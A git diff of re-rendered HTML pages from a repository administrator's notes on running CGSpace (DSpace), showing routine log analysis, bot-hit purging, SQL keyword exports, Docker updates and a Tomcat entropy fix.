                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -19224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -19215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -16721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -17880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -12103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -4651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -22785
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -21406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -25967
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -20850
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -6388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -5945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -46371
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -9024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -12521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -16163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -dspace.log.2021-06-27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -5886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ for file in dspace.log.2021-06-[12]*; do echo "$file"; grep -oE 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +19072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +19224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +19215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +16721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +17880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +12103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +4651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +22785
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +21406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +25967
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +20850
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +6388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +5945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +46371
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +9024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +12521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +16163
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +dspace.log.2021-06-27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +5886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I see 15,000 unique IPs in the XMLUI logs alone on that day:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              # zcat /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.4.gz | grep '23/Jun/2021' | awk '{print $1}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -15835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                # zcat /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.4.gz | grep '23/Jun/2021' | awk '{print $1}' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +15835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Annoyingly I found 37,000 more hits from Bing using dns:*msnbot* AND dns:*.msn.com. as a Solr filter
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • WTF, they are using a normal user agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • @@ -628,8 +628,8 @@ dspace.log.2021-06-27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • The DSpace log shows:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2021-06-30 08:19:15,874 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2021-06-30 08:19:15,874 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • The first one of these I see is from last night at 2021-06-29 at 10:47 PM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I restarted Tomcat 7 and CGSpace came back up…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I didn’t see that Atmire had responded last week (on 2021-06-23) about the issues we had @@ -641,14 +641,14 @@ dspace.log.2021-06-27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Export a list of all CGSpace’s AGROVOC keywords with counts for Enrico and Elizabeth Arnaud to discuss with AGROVOC:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    localhost/dspace63= > \COPY (SELECT DISTINCT text_value AS "dcterms.subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY "dcterms.subject" ORDER BY count DESC) to /tmp/2021-06-30-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -COPY 20780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      localhost/dspace63= > \COPY (SELECT DISTINCT text_value AS "dcterms.subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY "dcterms.subject" ORDER BY count DESC) to /tmp/2021-06-30-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +COPY 20780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Actually Enrico wanted NON AGROVOC, so I extracted all the center and CRP subjects (ignoring system office and themes):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242) GROUP BY subject ORDER BY count DESC) to /tmp/2021-06-30-non-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -COPY 1710
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242) GROUP BY subject ORDER BY count DESC) to /tmp/2021-06-30-non-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +COPY 1710
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Fix an issue in the Ansible infrastructure playbooks for the DSpace role
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • It was causing the template module to fail when setting up the npm environment
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -657,13 +657,13 @@ COPY 1710
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I saw a strange message in the Tomcat 7 journal on DSpace Test (linode26):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Jun 30 16:00:09 linode26 tomcat7[30294]: WARNING: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [111,733] milliseconds.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Jun 30 16:00:09 linode26 tomcat7[30294]: WARNING: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [111,733] milliseconds.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • What’s even crazier is that it is twice that on CGSpace (linode18)!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Apparently OpenJDK defaults to using /dev/random (see /etc/java-8-openjdk/security/java.security):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            securerandom.source=file:/dev/urandom
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              securerandom.source=file:/dev/urandom
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /dev/random blocks and can take a long time to get entropy, and urandom on modern Linux is a cryptographically secure pseudorandom number generator
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Now Tomcat starts much faster and no warning is printed so I’m going to add this to our Ansible infrastructure playbooks
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • diff --git a/docs/2021-07/index.html b/docs/2021-07/index.html index b9ba693b2..575020907 100644 --- a/docs/2021-07/index.html +++ b/docs/2021-07/index.html @@ -30,7 +30,7 @@ Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVO localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; COPY 20994 "/> - + @@ -120,17 +120,17 @@ COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2021-07-04

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2021-07-04

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Update all Docker containers on the AReS server (linode20) and rebuild OpenRXV:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ cd OpenRXV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ docker-compose -f docker/docker-compose.yml down
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ docker-compose -f docker/docker-compose.yml build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ cd OpenRXV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ docker-compose -f docker/docker-compose.yml down
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ docker-compose -f docker/docker-compose.yml build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Then run all system updates and reboot the server
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • After the server came back up I cloned the openrxv-items-final index to openrxv-items-temp and started the plugins
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -172,27 +172,27 @@ $ docker-compose -f docker/docker-compose.yml build
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./ilri/check-spider-hits.sh -f /tmp/spiders -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 95 hits from Drupal in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 38 hits from DTS Agent in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 601 hits from Microsoft Office Existence Discovery in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 51 hits from Site24x7 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 62 hits from Trello in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 13574 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 144 hits from FlipboardProxy in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 37 hits from LinkWalker in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 1 hits from [Ll]ink.?[Cc]heck.? in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Purging 427 hits from WordPress in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -Total number of bot hits purged: 15030
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./ilri/check-spider-hits.sh -f /tmp/spiders -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 95 hits from Drupal in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 38 hits from DTS Agent in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 601 hits from Microsoft Office Existence Discovery in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 51 hits from Site24x7 in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 62 hits from Trello in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 13574 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 144 hits from FlipboardProxy in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 37 hits from LinkWalker in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 1 hits from [Ll]ink.?[Cc]heck.? in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Purging 427 hits from WordPress in statistics
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +Total number of bot hits purged: 15030
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Meet with the CGIAR–AGROVOC task group to discuss how we want to do the workflow for submitting new terms to AGROVOC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • I extracted another list of all subjects to check against AGROVOC:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      \COPY (SELECT DISTINCT(LOWER(text_value)) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-06-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvcut -c 1 /tmp/2021-07-06-all-subjects.csv | sed 1d > /tmp/2021-07-06-all-subjects.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-06-agrovoc-results-all-subjects.csv -d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \COPY (SELECT DISTINCT(LOWER(text_value)) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-06-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvcut -c 1 /tmp/2021-07-06-all-subjects.csv | sed 1d > /tmp/2021-07-06-all-subjects.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-06-agrovoc-results-all-subjects.csv -d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Test Hrafn Malmquist’s proposed DBCP2 changes for DSpace 6.4 (DS-4574)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • His changes reminded me that we can perhaps switch back to using this pooling instead of Tomcat 7’s JDBC pooling via JNDI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -205,84 +205,84 @@ $ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        # for num in {10..26}; do echo "2021-06-$num"; zcat /var/log/nginx/access.log.*.gz /var/log/nginx/library-access.log.*.gz | grep "$num/Jun/2021" | awk '{print $1}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -10693
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -10587
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -7958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -7681
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -12639
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -15388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -12245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -11187
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -9684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -7835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -7198
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -10380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -10255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -15878
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -9963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -9439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -7930
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          # for num in {10..26}; do echo "2021-06-$num"; zcat /var/log/nginx/access.log.*.gz /var/log/nginx/library-access.log.*.gz | grep "$num/Jun/2021" | awk '{print $1}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +10693
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +10587
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +7958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +7681
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +12639
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +15388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +12245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +11187
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +9684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +7835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +7198
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +10380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +10255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +15878
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +9963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +9439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +7930
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Similarly, the number of connections to the REST API was around the average for the recent weeks before:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          # for num in {10..26}; do echo "2021-06-$num"; zcat /var/log/nginx/rest.*.gz | grep "$num/Jun/2021" | awk '{print $1}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1183
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1257
